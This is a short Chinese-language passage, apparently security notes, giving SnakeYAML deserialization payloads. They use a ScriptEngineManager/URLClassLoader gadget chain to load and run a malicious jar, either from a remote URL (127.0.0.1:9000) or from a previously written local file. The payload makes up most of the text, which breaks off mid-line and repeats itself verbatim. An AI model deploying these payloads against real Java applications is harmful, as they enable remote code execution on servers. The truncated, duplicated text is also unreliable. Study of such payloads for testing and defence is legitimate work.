SnakeYaml的常见出网利用方式：!!javax.script.ScriptEngineManager[!!java.net.URLClassLoader[[!!java.net.URL["http://127.0.0.1:9000/yaml-payload.jar"]]]]不出网利用方式：写入恶意文件，之后使用上面的利用链。!!javax.script.ScriptEngineManager[!!java.net.URLClassLoader[[!!java.net.URL["file:D:\\yaml-payload.jar"]]]]在java中的执行如下URLurl=newURL("

SnakeYaml的常见出网利用方式：!!javax.script.ScriptEngineManager[!!java.net.URLClassLoader[[!!java.net.URL["http://127.0.0.1:9000/yaml-payload.jar"]]]]不出网利用方式：写入恶意文件，之后使用上面的利用链。!!javax.script.ScriptEngineManager[!!java.net.URLClassLoader[[!!java.net.URL["file:D:\\yaml-payload.jar"]]]]在java中的执行如下URLurl=newURL("